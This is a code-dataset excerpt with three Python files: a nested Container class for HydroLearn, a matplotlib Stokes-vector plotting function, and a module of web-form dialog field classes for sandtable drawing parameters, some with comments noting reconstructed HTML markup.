# Deletes a var called by \"name\", under partition \"partition\", at descendant container \"path\"\n def __rem(self, name, partition=None, path=None, recurse=False, must_exist=True):\n self.validate_types(name, None, partition, path)\n con = self.get_container(path)\n if partition == \"*\":\n 
partitions = []\n for _name, _value, _partition in con.get_name_value_partitions(False):\n if name == _name:\n partitions += [_partition]\n for _partition in partitions:\n con.__rem(name, _partition, path, recurse, must_exist)\n return self\n key = self.create_key(name, partition)\n if not con.key_exists(key):\n if recurse:\n for key, value in con.get_key_values():\n if isinstance(value, Container):\n value.__rem(name, partition, recurse, must_exist)\n if must_exist:\n raise ValueError(\"Key \\\"%s\\\" does not exist in this Container\" % (key))\n else:\n del con.__dict__[key]\n return self\n\n def has(self, name, partition=None, path=None, recurse=True):\n con = self.get_container(path)\n if not recurse:\n return self.create_key(name, partition) in con\n return con.__has(name, partition)\n\n def __has(self, name, partition=None):\n checks = [self.create_key(name, partition) in self]\n for _name, value, _partition in self.get_name_value_partitions(sort=False):\n if isinstance(value, Container):\n checks.append(value.__has(name, partition))\n return any(checks)\n\n # Public copy method: implements all macro copy operations\n def copy(self, con, overwrite=True):\n bad_type = True\n if isinstance(con, list):\n bad_type = any([not isinstance(_con, Container) for _con in con])\n elif isinstance(con, Container) or con is None:\n bad_type = False\n if bad_type:\n raise ValueError(\"Item for copying must be a Container, list of Containers, or None\")\n if isinstance(con, list):\n for _con in con:\n self.__copy(_con, overwrite)\n elif isinstance(con, Container):\n self.__copy(con, overwrite)\n return self\n\n # Private copy method: copies all variables of the given container into this one\n def __copy(self, con, overwrite=True):\n for name, value, partition in con.get_name_value_partitions():\n if self.var_exists(name, partition) and not overwrite:\n continue\n if isinstance(value, Container): # copy a container\n self.__set(name, Container().__copy(value), partition)\n elif not self.is_reserved(name): # copy a single var\n self.__set(name, value, partition)\n return self\n\n # Checkout returns a new container populated with the variable(s) called by name\n def checkout(self, name, partition=None, recurse=True, must_exist=False):\n if isinstance(name, str):\n name = [name]\n if isinstance(partition, str):\n partition = [partition]\n elif partition is None:\n partition = [None for i in range(len(name))]\n con = Container()\n for _name, _partition in zip(name, partition):\n value = self.__get(_name, _partition, recurse=recurse, must_exist=must_exist)\n if not value is None:\n con.__set(_name, value, _partition)\n return con\n\n # Merge combines all vars of this and the given container\n def merge(self, con, recurse_surface_var=True, coincident_only=True):\n if recurse_surface_var:\n self.merge_surface_var(con)\n self.merge_containers(con, coincident_only)\n return self\n\n # Merges all surface variables: those not in a descendant container\n # recurse: propagate all surface variables through descendant containers\n def merge_surface_var(self, con, recurse=True):\n for name, value, partition in self.get_name_value_partitions():\n if not isinstance(value, Container):\n if con.var_exists(name, partition) and not self.is_reserved(name): # merge required\n self.__set(name, con.get(name, partition), partition)\n elif recurse: # value is a container and surface vars are being propagated down\n value.merge_surface_var(con)\n return self\n\n # Merges all non-surface variables: those in descendant containers\n 
def merge_containers(self, con, coincident_only=True, in_recursion=False):\n for name, value, partition in con.get_name_value_partitions():\n if name == \"partitions\": # will be populated automatically\n continue\n if self.var_exists(name, partition): # in the given container: must be merged\n my_value = self.__get(name, partition)\n if isinstance(value, Container) and isinstance(my_value, Container): # merge two containers\n my_value.merge_containers(value, in_recursion=True)\n elif in_recursion: # only merge vars when in a descendant container\n self.__set(name, value, partition)\n elif not coincident_only:\n self.__set(name, value, partition)\n return self\n\n def walk(self):\n paths = {}\n leaf_paths = self._walk()\n for path in leaf_paths:\n for i in range(len(path), 0, -1):\n paths[tuple(path[:i])] = None # Cannot hash lists since they are mutable\n paths = [None] + [list(path) for path in paths.keys()] # [None] denotes the root path\n path_var_pairs = []\n for path in paths:\n con = self.get_container(path)\n for name, value, partition in con.get_name_value_partitions(False):\n path_var_pairs += [[path, [name, value, partition]]]\n return path_var_pairs\n\n def _walk(self):\n paths = []\n for name, value, partition in self.get_name_value_partitions(False):\n if self.is_container(name, partition):\n child_paths = value._walk() # Returns list of string lists (lists of strings)\n if len(child_paths) == 0: # Reached leaf container\n paths += [[name]]\n else: # Not a leaf container: prepend \"name\" to all child_paths\n paths += [[name] + path for path in child_paths]\n return paths\n\n def find(self, name, value, comparator=\"==\", partition=None, path=None, recurse=True):\n if isinstance(name, str): # cast to multi-condition\n name = [name]\n value = [value]\n elif not isinstance(value, list):\n raise ValueError(\n \"Input name=%s contains multiple instances but value=%s does not\" % (str(name), str(value))\n )\n elif len(name) != len(value):\n raise ValueError(\n \"Input name=%s does not map one-to-one with value=%s\" % (str(name), str(value))\n )\n if not isinstance(comparator, list): # broadcast comparator singleton to all name-value pairs\n comparator = [comparator for _ in range(len(name))]\n for i in range(len(comparator)):\n if isinstance(comparator[i], str):\n if not comparator[i] in util.comparator_fn_map:\n raise NotImplementedError(\"Unknown comparator=\\\"%s\\\"\" % (comparator[i]))\n comparator[i] = util.comparator_fn_map[comparator[i]]\n elif not callable(comparator[i]): # callable() is the check; callable is not a type for isinstance()\n raise ValueError(\n \"Input comparator=%s must be str, callable, or list of str and/or callable\" % (str(comparator))\n )\n con = Container()\n _con = self.get_container(path)\n for _name, _value, _partition in _con.get_name_value_partitions(False):\n if _con.is_container(_name, _partition):\n checks = []\n for __name, __value, __comparator in zip(name, value, comparator):\n checks.append(_value.__find(__name, __value, __comparator, partition, recurse))\n if all(checks):\n con.set(_name, _value, _partition)\n else:\n con.set(_name, _value, _partition)\n return con\n\n def __find(self, name, value, comparator=lambda a, b: a == b, partition=None, recurse=True, in_recursion=False):\n checks = []\n for _name, _value, _partition in self.get_name_value_partitions(False):\n if self.is_container(_name, _partition) and recurse:\n checks.append(_value.__find(name, value, comparator, partition, recurse, True))\n elif _name == name and _partition == partition:\n checks.append(comparator(_value, 
value))\n return any(checks)\n\n def hash(self, n_digits):\n _hash = self.__hash(n_digits) % 10**n_digits\n# if len(str(_hash)) < n_digits:\n# _hash += 10**(n_digits - 1)\n return _hash * 10**(n_digits - len(str(_hash)))\n\n def __hash(self, n_digits):\n _sum = 0\n for name, value, partition in self.get_name_value_partitions(sort=False):\n if self.is_reserved(name):\n continue\n if isinstance(value, Container):\n _sum += value.hash(n_digits)\n else:\n _sum += util.hash_str_to_int(name, n_digits)\n _sum += util.hash_str_to_int(str(value), n_digits)\n if not partition is None:\n _sum += util.hash_str_to_int(partition, n_digits)\n return _sum\n\n def get_names(self, sort=False):\n names = set()\n for key, value in self.get_key_values():\n partition = self.get_partition_from_key(key)\n name = self.get_name_from_key(key)\n if not self.is_reserved(name):\n names.add(name)\n names = list(names)\n if sort:\n names.sort()\n return names\n\n def get_values(self, sort=False):\n values = list(self.__dict__.values())\n if sort:\n values = sorted(values)\n return values\n\n def get_partitions(self, sort=False):\n partitions = self.__dict__.get(\"partitions\", [])\n if sort:\n partitions = sorted(partitions)\n return partitions\n\n def get_name_value_partitions(self, sort=True, order=\"\"):\n name_value_partitions = []\n for key, value in self.get_key_values():\n partition = self.get_partition_from_key(key)\n name = self.get_name_from_key(key)\n if not self.is_reserved(name):\n name_value_partitions += [[name, value, partition]]\n if sort:\n name_value_partitions.sort(key = lambda x: x[0])\n if order == \"basic_first\":\n first, last = [], []\n for name_value_partition in name_value_partitions:\n if isinstance(name_value_partition[1], Container):\n last += [name_value_partition]\n else:\n first += [name_value_partition]\n name_value_partitions = first + last\n return name_value_partitions\n\n # Validate the types are correct for of all inputs\n def validate_types(self, name, value, partition, path):\n self.validate_type(name, \"name\")\n self.validate_type(value, \"value\")\n self.validate_type(partition, \"partition\")\n self.validate_type(path, \"path\")\n\n # Validate the type is correct for the given input\n def validate_type(self, item, category):\n category_types_map = {\n \"name\": [util.Types.is_string],\n \"value\": [util.Types.is_anything],\n \"partition\": [util.Types.is_none, util.Types.is_string],\n \"path\": [util.Types.is_none, util.Types.is_list_of_strings],\n }\n bad_type = not any(type_func(item) for type_func in category_types_map[category])\n if bad_type:\n raise ValueError(\"%s has incorrect type: %s\" % (category.capitalize(), item))\n\n # Validate the type is correct for the given input\n def old_validate_type(self, item, category, multi_value=False):\n category_types_map = {\n \"name\": [util.Types.is_string, util.Types.is_list_of_strings],\n \"value\": [util.Types.is_list, util.Types.is_anything],\n \"partition\": [util.Types.is_none, util.Types.is_string, util.Types.is_list_of_strings],\n \"path\": [util.Types.is_none, util.Types.is_list_of_strings],\n }\n if multi_value:\n category_types_map[\"value\"] = [util.Types.is_list]\n bad_type = not any(type_func(item) for type_func in category_types_map[category])\n if bad_type:\n raise ValueError(\"%s has incorrect type: %s\" % (category.capitalize(), item))\n\n # Updates the reserved variable partitions\n def update_partitions(self, partition):\n if partition is None:\n return\n if not \"partitions\" in self:\n 
self.__dict__[\"partitions\"] = set()\n self.__get(\"partitions\").add(partition)\n\n # Create the key that will map this variable to its value\n def create_key(self, name, partition):\n key = \"\"\n if self.partition_sep in name:\n raise ValueError(\"Name cannot contain the partition-name separator \\\"%s\\\"\" % (self.partition_sep))\n if not partition is None:\n key += partition + self.partition_sep\n key += name\n return key\n\n # Get the container located at the given path\n # create: add a new container or containers to establish the path if it doesn't exist\n def get_container(self, path, create=False):\n if path is None:\n return self\n con = self\n for _path in path:\n if not con.path_exists(_path):\n if create:\n con.__set(_path, Container())\n else:\n raise ValueError(\"Path \\\"%s\\\" does not exist in this Container\" % (\n self.path_sep.join(path))\n )\n con = con.__get(_path)\n return con\n\n def get_keys(self):\n return self.__dict__.keys()\n\n def get_key_values(self):\n return self.__dict__.items()\n\n def get_partition(self, name, value):\n for key, _value in self.get_key_values():\n _partition = self.get_partition_from_key(key)\n _name = self.get_name_from_key(key)\n if name == _name and value == _value:\n return _partition\n\n def get_partition_from_key(self, key):\n partition = None\n if self.partition_sep in key:\n partition = self.partition_sep.join(key.split(self.partition_sep)[:-1])\n return partition\n\n def get_name_from_key(self, key):\n return key.split(self.partition_sep)[-1]\n\n def size(self):\n return len(self.get_keys())\n\n def get_memory_of(self):\n size = 0\n for key, value in self.get_key_values():\n if isinstance(value, Container):\n size += value.get_memory_of()\n else:\n size += sys.getsizeof(value)\n return size\n\n def key_exists(self, key):\n return key in self.__dict__\n\n def var_exists(self, name, partition=None, path=None, recurse=False):\n con = self.get_container(path)\n return con.key_exists(self.create_key(name, partition))\n\n def path_exists(self, path):\n if path is None:\n return False\n return self.key_exists(path) and self.is_container(path)\n\n def is_var(self, name, partition=None, path=None):\n return not self.is_container(name, partition, path)\n\n def is_container(self, name, partition=None, path=None):\n return isinstance(self.__get(name, partition, path), Container)\n\n def is_reserved(self, name):\n return name in self.reserved_names\n\n def is_empty(self):\n return self.size() == 0\n\n def to_dict(self):\n _dict = {}\n for key, value in self.get_key_values():\n _dict[key] = value\n if isinstance(value, Container):\n _dict[key] = value.to_dict()\n return _dict\n\n def from_dict(self, _dict):\n for key, value in _dict.items():\n if isinstance(value, dict):\n value = Container().from_dict(value)\n self.set(key, value)\n return self\n\n def to_string(self, recurse=True, sort=True, extent=[110, 1], in_recursion=False):\n def cut_x(line, x_extent):\n if x_extent < 0:\n return line\n j = line.rfind(\" = \") + 3\n cut_idx = max(j, x_extent)\n return line[:cut_idx] + \" ...\"\n def cut_y(var_string, y_extent):\n if y_extent < 0:\n return var_string\n var_string_lines = var_string.split(\"\\n\")\n return \"\\n\".join(var_string_lines[:y_extent])\n expand = True\n indent = 4 * \" \"\n lines = []\n max_key_len = -1\n for key, value in self.get_key_values():\n if len(key) > max_key_len:\n max_key_len = len(key)\n left_just = max_key_len\n for name, value, partition in self.get_name_value_partitions(sort=sort, order=\"basic_first\"):\n 
if self.is_reserved(name): # don't bother displaying reserved vars\n                continue\n            key = self.create_key(name, partition)\n            value_string = str(value)\n            if isinstance(value, Container):\n                left_just = 0\n                key = \"-> \" + key\n                var_string = \"Container @ size(%s)\" % (util.format_memory(value.get_memory_of()))\n                if recurse:\n                    var_string += \" = \\n%s%s\" % (\n                        indent,\n                        value.to_string(recurse, sort, extent, True).replace(\"\\n\", \"\\n%s\" % (indent))\n                    )\n                var_string = \"%-*s = %s\" % (left_just, key, var_string)\n                lines += var_string.split(\"\\n\")\n            else:\n                if isinstance(value, np.ndarray):\n                    var_string = \"NumPy.ndarray @ shape(\" + \", \".join(map(str, value.shape)) + \")\"\n                    if expand:\n                        var_string += \" = %s\" % (value_string)\n                elif isinstance(value, torch.Tensor):\n                    var_string = \"PyTorch.Tensor @ shape(\" + \", \".join(map(str, value.shape)) + \")\"\n                    if expand:\n                        var_string += \" = %s\" % (value_string)\n                elif isinstance(value, list):\n                    var_string = \"List @ len(%d)\" % len(value)\n                    if expand:\n                        var_string += \" = %s\" % (value_string)\n                elif isinstance(value, dict):\n                    var_string = \"Dictionary @ len(%d)\" % len(value)\n                    if expand:\n                        var_string += \" = %s\" % (value_string)\n                elif isinstance(value, set):\n                    var_string = \"Set @ len(%d)\" % len(value)\n                    if expand:\n                        var_string += \" = %s\" % (value_string)\n                elif isinstance(value, str):\n                    var_string = \"String @ len(%d)\" % len(value)\n                    if expand:\n                        var_string += \" = \\\"%s\\\"\" % (value_string)\n                else:\n                    var_string = value_string\n                if var_string.count(\"\\n\") > extent[1]:\n                    var_string = cut_y(var_string, extent[1])\n                lines += [\"%-*s = %s\" % (left_just, key, var_string)]\n        if not in_recursion: # Only cut lines of final result\n            for i in range(len(lines)):\n                if len(lines[i]) > extent[0]: # Needs to be cut short\n                    lines[i] = cut_x(lines[i], extent[0])\n        return \"\\n\".join(lines)\n\n    def __eq__(self, con):\n        if not isinstance(con, Container):\n            return False\n        if len(self) != len(con):\n            return False\n        if not self.get_keys() == con.get_keys():\n            return False\n        eqs = []\n        for name, value, partition in self.get_name_value_partitions():\n            eqs.append(value == con.__get(name, partition))\n        return all(eqs)\n\n    def __len__(self):\n        return len(self.__dict__)\n\n    def __str__(self):\n        return self.to_string()\n\n    def __contains__(self, obj):\n        if isinstance(obj, (list, tuple)):\n            return self.var_exists(obj[0], obj[1])\n        elif not isinstance(obj, str):\n            raise ValueError(\n                \"Comparison object may be str or list/tuple of str w/ len=2. Received %s\" % (type(obj))\n            )\n        return self.key_exists(obj)\n\n    def __getitem__(self, key):\n        if isinstance(key, int) or isinstance(key, slice):\n            return list(self.get_name_value_partitions())[key]\n        return self.get(key)\n","repo_name":"HipGraph/HydroLearn","sub_path":"Container.py","file_name":"Container.py","file_ext":"py","file_size_in_byte":28899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"31337984093","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\n\ndef plot_stokes(stokes,normalized=False,cmap='inferno'):\n \"\"\"plots stokes vector\n\n Parameters\n ----------\n stokes : list or ndarray with first dimension of length 4\n Stokes vector array\n \"\"\"\n\n fig,ax = plt.subplots(ncols=4,figsize=[10,3])\n for i,data in enumerate(stokes):\n if normalized:\n data /= stokes[0]\n im = ax[i].imshow(data,cmap='inferno')\n div = make_axes_locatable(ax[i])\n cax = div.append_axes(\"right\", size=\"7%\", pad=\"2%\")\n cb = fig.colorbar(im,cax=cax)\n plt.show()\n\n","repo_name":"Jashcraf/polarization-gsmts-II","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"40626269114","text":"import os\nimport random\nimport copy\nfrom html import escape\nfrom hashlib import md5\n\n\nclass Params(dict):\n def __init__(self, editor=None):\n super(Params, self).__init__()\n if editor:\n for field in editor:\n self[field.name] = field.default\n\n def randomize(self, editor):\n for field in editor:\n # FIX: This is very specific to sandtable drawing methods\n if field.name not in ['width', 'length']:\n value = field._random()\n if value is not None:\n self[field.name] = value\n\n def hash(self):\n h = md5()\n h.update(bytes(str(self.items), 'utf-8'))\n return h.hexdigest()\n\n def __getattribute__(self, attr):\n if attr in self:\n return self[attr]\n return super(Params, self).__getattribute__(attr)\n\n\nclass Dialog:\n def __init__(self, editor, form, params, autoSubmit=False):\n self.editor = editor\n self.form = form\n self.autoSubmit = autoSubmit\n self.params = params if params else Params()\n\n def getAction(self):\n return self.form.action\n\n def getMethod(self):\n return self.form.method\n\n def getParams(self):\n # Run through all of the editor fields converting form or editor defaults into params\n # Check all of the values for validity and generate errors if there are issues\n self.errors = {}\n for field in self.editor:\n if hasattr(self.params, field.name):\n continue\n if hasattr(field, 'fromFormRaw'):\n self.params[field.name] = field.fromFormRaw(self.form)\n elif field.name in self.form:\n try:\n value = field.fromForm(self.form.get(field.name))\n except ValueError:\n self.errors[field.name] = \"Invalid, set to default\"\n value = field.default\n err = field.errorCheck(value)\n if err:\n value = err[0]\n self.errors[field.name] = err[1]\n self.params[field.name] = value\n else:\n self.params[field.name] = field.default\n return self.params\n\n def html(self):\n s = '
<table>\n'\n        for field in self.editor:\n            s += '<tr><td>%s</td>' % field.prompt\n            s += '<td>%s %s</td>' % (field.toForm(getattr(self.params, field.name)), field.units)\n            if field.name in self.errors:\n                s += '<td>%s</td>' % self.errors[field.name]\n            s += '</tr>\n'\n        s += '</table>
'\n        return s\n\n\nclass DialogField:\n    def __init__(self, name, prompt, units, default, min, max, randRange):\n        self.name = name\n        self.prompt = prompt\n        self.units = units\n        self.default = default\n        self.min = min\n        self.max = max\n        self.randRange = randRange\n\n    def toForm(self, value):\n        return None\n\n    def fromForm(self, value):\n        return None\n\n    def errorCheck(self, value):\n        if self.min is not None and value < self.min:\n            return (self.min, \"Too low, set to minimum\")\n        if self.max is not None and value > self.max:\n            return (self.max, \"Too high, set to maximum\")\n        return None\n\n\nclass DialogFloat(DialogField):\n    def __init__(self, name, prompt, units='', default=0.0, min=None, max=None, randRange=None, format='%g', rbutton=False, slider=True, step=None, rRound=4):\n        DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n        self.format = format\n        self.rbutton = rbutton\n        self.slider = slider if min is not None and max is not None else False\n        self.step = step if step else (max - min) / 100. if self.slider else None\n        self.rRound = rRound\n\n    def toForm(self, value):\n        v = self.format % value\n        if self.rbutton:\n            # NOTE: the original HTML templates were stripped from this record; the markup below is a best-guess reconstruction\n            button = '<input type=\"button\" name=\"%s_r\" value=\"Random\" data-min=\"%s\" data-max=\"%s\">' % (self.name, self.min, self.max)\n        else:\n            button = ''\n        if self.slider:\n            slider = '<input type=\"range\" name=\"%s_s\" min=\"%s\" max=\"%s\" step=\"%s\" value=\"%s\" oninput=\"%s.value=%s_s.value\">' % (\n                self.name, self.min, self.max, self.step, v, self.name, self.name)\n            sliderInform = 'onchange=\"%s_s.value=%s.value\"' % (self.name, self.name)\n        else:\n            slider = ''\n            sliderInform = ''\n        return '<input type=\"text\" name=\"%s\" value=\"%s\" %s>%s%s' % (self.name, v, sliderInform, slider, button)\n\n    def fromForm(self, value):\n        return float(value)\n\n    def _random(self):\n        if self.randRange:\n            return round(random.triangular(self.randRange[0], self.randRange[1], self.default), self.rRound)\n        return None if self.min is None or self.max is None else round(random.triangular(self.min, self.max, self.default), self.rRound)\n\n\nclass DialogFloats(DialogField):\n    def __init__(self, name, prompt, units='', default=[], min=None, max=None, randRange=None, minNums=None, maxNums=None, rRound=4):\n        DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n        self.minNums = minNums\n        self.maxNums = maxNums\n        self.rRound = rRound\n\n    def toForm(self, value):\n        # NOTE: reconstructed markup (original stripped from this record)\n        return '<input type=\"text\" name=\"%s\" value=\"%s\">' % (self.name, self._format(value))\n\n    def fromForm(self, value):\n        return [float(num) for num in value.split(',')]\n\n    def errorCheck(self, value):\n        error = False\n        for i in range(len(value)):\n            if self.min is not None and value[i] < self.min:\n                value[i] = self.min\n                error = True\n            if self.max is not None and value[i] > self.max:\n                value[i] = self.max\n                error = True\n        if error:\n            return (value, \"Numbers were out of range\")\n        return None\n\n    def _format(self, values):\n        return ','.join([\"%g\" % n for n in values])\n\n    def _random(self):\n        if self.randRange:\n            count = random.randint(self.minNums, self.maxNums)\n            return [round(random.triangular(self.randRange[0], self.randRange[1], self.max), self.rRound) for i in range(count)]\n        if self.minNums and self.maxNums:\n            count = random.randint(self.minNums, self.maxNums)\n            return [round(random.triangular(self.min, self.max), self.rRound) for i in range(count)]\n        return None\n\n\nclass DialogInt(DialogField):\n    def __init__(self, name, prompt, units='', default=0, min=None, max=None, randRange=None, format='%d', rbutton=False, slider=True):\n        DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n        self.format = format\n        self.rbutton = rbutton\n        self.slider = slider if min is not None and max is not None else False\n\n    def toForm(self, value):\n        v = self.format % value\n        if self.rbutton:\n            # NOTE: reconstructed markup (original stripped from this record)\n            button = '<input type=\"button\" name=\"%s_r\" value=\"Random\" data-min=\"%s\" data-max=\"%s\">' % (self.name, self.min, self.max)\n        else:\n            button = ''\n        if self.slider:\n            slider = '<input type=\"range\" name=\"%s_s\" min=\"%s\" max=\"%s\" value=\"%s\" oninput=\"%s.value=%s_s.value\">' % (\n                self.name, self.min, self.max, v, self.name, self.name)\n            sliderInform = 'onchange=\"%s_s.value=%s.value\"' % (self.name, self.name)\n        else:\n            slider = ''\n            sliderInform = ''\n        return '<input type=\"text\" name=\"%s\" value=\"%s\" %s>%s%s' % (self.name, v, sliderInform, slider, button)\n\n    def fromForm(self, value):\n        return int(float(value))\n\n    def _random(self):\n        if self.randRange:\n            return int(random.triangular(self.randRange[0], self.randRange[1], self.default))\n        return None if self.min is None or self.max is None else int(random.triangular(self.min, self.max, self.default))\n\n\nclass DialogInts(DialogField):\n    def __init__(self, name, prompt, units='', default=[], min=None, max=None, randRange=None, minNums=None, maxNums=None):\n        DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n        self.minNums = minNums\n        self.maxNums = maxNums\n\n    def toForm(self, value):\n        # NOTE: reconstructed markup (original stripped from this record)\n        return '<input type=\"text\" name=\"%s\" value=\"%s\">' % (self.name, self._format(value))\n\n    def fromForm(self, value):\n        return [int(num) for num in value.split(',')]\n\n    def errorCheck(self, value):\n        error = False\n        for i in range(len(value)):\n            if self.min is not None and value[i] < self.min:\n                value[i] = self.min\n                error = True\n            if self.max is not None and value[i] > self.max:\n                value[i] = self.max\n                error = True\n        if error:\n            return (value, \"Numbers were out of range\")\n        return None\n\n    def _format(self, values):\n        return ','.join([\"%d\" % n for n in values])\n\n    def _random(self):\n        if self.randRange:\n            return [random.randint(self.randRange[0], self.randRange[1]) for i in range(random.randint(self.minNums, self.maxNums))]\n        if self.minNums and self.maxNums:\n            return [random.randint(self.min, self.max) for i in range(random.randint(self.minNums, self.maxNums))]\n        return None\n\n\nclass DialogStr(DialogField):\n    def __init__(self, name, prompt, units='', default='', length=20):\n        DialogField.__init__(self, name, prompt, units, default, None, None, None)\n        self.length = length\n\n    def toForm(self, value):\n        # NOTE: reconstructed markup (original stripped from this record)\n        return '<input type=\"text\" name=\"%s\" size=\"%d\" value=\"%s\">' % (self.name, self.length, escape(value))\n\n    def fromForm(self, value):\n        return value\n\n    def _random(self):\n        return None\n\n\nclass DialogList(DialogField):\n    def __init__(self, name, prompt, units='', default='', list=[]):\n        DialogField.__init__(self, name, prompt, units, default, None, None, None)\n        self.list = list\n\n    def toForm(self, value):\n        # NOTE: reconstructed select markup; the original option-building code was stripped from this record\n        str = '<select name=\"%s\">' % self.name\n        for item in self.list:\n            selected = ' selected' if item == value else ''\n            str += '<option%s>%s</option>' % (selected, item)\n        str += '</select>'\n        return str\n\n    def fromForm(self, value):\n        return value\n\n    def _random(self):\n        return self.list[random.randint(0, len(self.list) - 1)]\n\n\nclass Dialog2Choices(DialogList):\n    def __init__(self, name, prompt, units='', default=False, list=['True', 'False']):\n        DialogList.__init__(self, name, prompt, units, default, list)\n\n    def toForm(self, value):\n        if value:\n            return DialogList.toForm(self, self.list[1])\n        else:\n            return DialogList.toForm(self, self.list[0])\n\n    def fromForm(self, value):\n        return value == self.list[1]\n\n    def _random(self):\n        return random.randint(0, 1)\n\n\nclass DialogYesNo(Dialog2Choices):\n    def __init__(self, name, prompt, units='', default=False):\n        DialogList.__init__(self, name, prompt, units, default, list=['No', 'Yes'])\n\n\nclass DialogTrueFalse(Dialog2Choices):\n    def __init__(self, name, prompt, units='', default=False):\n        DialogList.__init__(self, name, prompt, units, default, list=['False', 'True'])\n\n\nclass DialogOnOff(Dialog2Choices):\n    def __init__(self, name, prompt, units='', default=False):\n        DialogList.__init__(self, 
name, prompt, units, default, list=['Off', 'On'])\n\n\nclass DialogFile(DialogField):\n    def __init__(self, name, prompt, default='', filter='', extensions=False):\n        DialogField.__init__(self, name, prompt, '', default, None, None, None)\n        self.filter = filter\n        self.filters = filter.split('|')\n        self.extensions = extensions\n\n    def _extension(self, filename):\n        pieces = filename.split('.')\n        if len(pieces) < 2:\n            return ''\n        return '.' + pieces[-1].lower()\n\n    def toForm(self, value):\n        # NOTE: the original markup was stripped from this record; a plain text input is assumed here\n        str = '<input type=\"text\" name=\"%s\" value=\"%s\">' % (self.name, escape(value))\n        return str\n\n    def fromForm(self, value):\n        if value and len(value) and not value[0] in '/\\\\~.':\n            return value\n        return self.default\n\n    def _random(self):\n        path = self.default\n        def fl(f): return not f.startswith('.') and (self._extension(f) in self.filters or os.path.isdir(os.path.join(path, f)))\n        while True:\n            dirlist = list(filter(fl, os.listdir(path)))\n            if not len(dirlist):\n                return None\n            f = dirlist[random.randint(0, len(dirlist) - 1)]\n            if not os.path.isdir(os.path.join(path, f)):\n                return os.path.join(path, f)\n            path = os.path.join(path, f)\n\n\nclass DialogFont(DialogField):\n    def __init__(self, name, prompt, default='', filter='', extensions=False):\n        DialogField.__init__(self, name, prompt, '', default, None, None, None)\n        self.filter = filter\n        self.filters = filter.split('|')\n        self.extensions = extensions\n\n    def _extension(self, filename):\n        pieces = filename.split('.')\n        if len(pieces) < 2:\n            return ''\n        return '.' + pieces[-1].lower()\n\n    def toForm(self, value):\n        # NOTE: reconstructed select markup built from the font list; the original was stripped from this record\n        str = '<select name=\"%s\">' % self.name\n        for fontname, fontpath in self._getFonts():\n            selected = ' selected' if fontpath == value else ''\n            str += '<option value=\"%s\"%s>%s</option>' % (fontpath, selected, fontname)\n        str += '</select>'\n        return str\n\n    def _getFonts(self):\n        fonts = []\n        for root, dirs, files in os.walk('/usr/share/fonts'):\n            for file in files:\n                if file.endswith('.ttf'):\n                    fonts.append((file[:-4], os.path.join(root, file)))\n        fonts.sort()\n        return fonts\n\n    def fromForm(self, value):\n        return value\n\n    def _random(self):\n        fonts = self._getFonts()\n        return fonts[random.randint(0, len(fonts) - 1)][1]\n\n\nclass DialogMulti(DialogField):\n    def __init__(self, name, prompt, default='', rows=5, cols=20):\n        DialogField.__init__(self, name, prompt, '', default, None, None, None)\n        self.rows = rows\n        self.cols = cols\n\n    def toForm(self, value):\n        # NOTE: reconstructed textarea markup (original stripped from this record)\n        str = '<textarea name=\"%s\" rows=\"%d\" cols=\"%d\">%s</textarea>' % (self.name, self.rows, self.cols, escape(value))\n        return str\n\n    def fromForm(self, value):\n        return value\n\n    def _random(self):\n        return None\n\n\nclass DialogColor(DialogField):\n    def __init__(self, name, prompt, default=(255, 255, 255)):\n        DialogField.__init__(self, name, prompt, '', default, None, None, None)\n\n    def toForm(self, value):\n        color = \"#%02x%02x%02x\" % value\n        str = '<input type=\"color\" name=\"%s\" value=\"%s\">' % (self.name, color)\n        return str\n\n    def fromForm(self, value):\n        value = value.lstrip('#')\n        lv = len(value)\n        return tuple(int(value[i:i+int(lv/3)], 16) for i in range(0, lv, int(lv/3)))\n\n    def _random(self):\n        return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n\n\nclass DialogBreak(DialogField):\n    def __init__(self, name='', prompt='', default=''):\n        DialogField.__init__(self, name, prompt, '', default, None, None, None)\n\n    def toForm(self, value):\n        return ''\n\n    def fromForm(self, value):\n        pass\n\n    def _random(self):\n        return None\n\n\nclass ArrayValue:\n    def __repr__(self):\n        return '['+','.join(['%s:%s' % (n, getattr(self, n)) for n in [x for x in dir(self) if not x.startswith('_')]])+']'\n\n\nclass DialogArray(DialogField):\n    def __init__(self, name='', prompt='', default='', fields=None, length=3):\n        DialogField.__init__(self, name, prompt, '', default, None, None, None)\n        self.fields = fields\n        self.length = length\n\n    def toForm(self, value):\n        result = '<table>'\n\n        titles = '<tr>'\n        units = '<tr>'\n        for field in self.fields:\n            titles += '<th>%s</th>' % field.prompt\n            units += '<th>%s</th>' % field.units\n        titles += '</tr>'\n        units += '</tr>'\n        result += titles + units\n\n        for row in range(self.length):\n            result += '<tr>'\n            for field in self.fields:\n                fieldCopy = copy.copy(field)\n                fieldCopy.name += \"-%d\" % row\n                result += '<td>%s</td>' % fieldCopy.toForm(getattr(value[row], field.name))\n            result += '
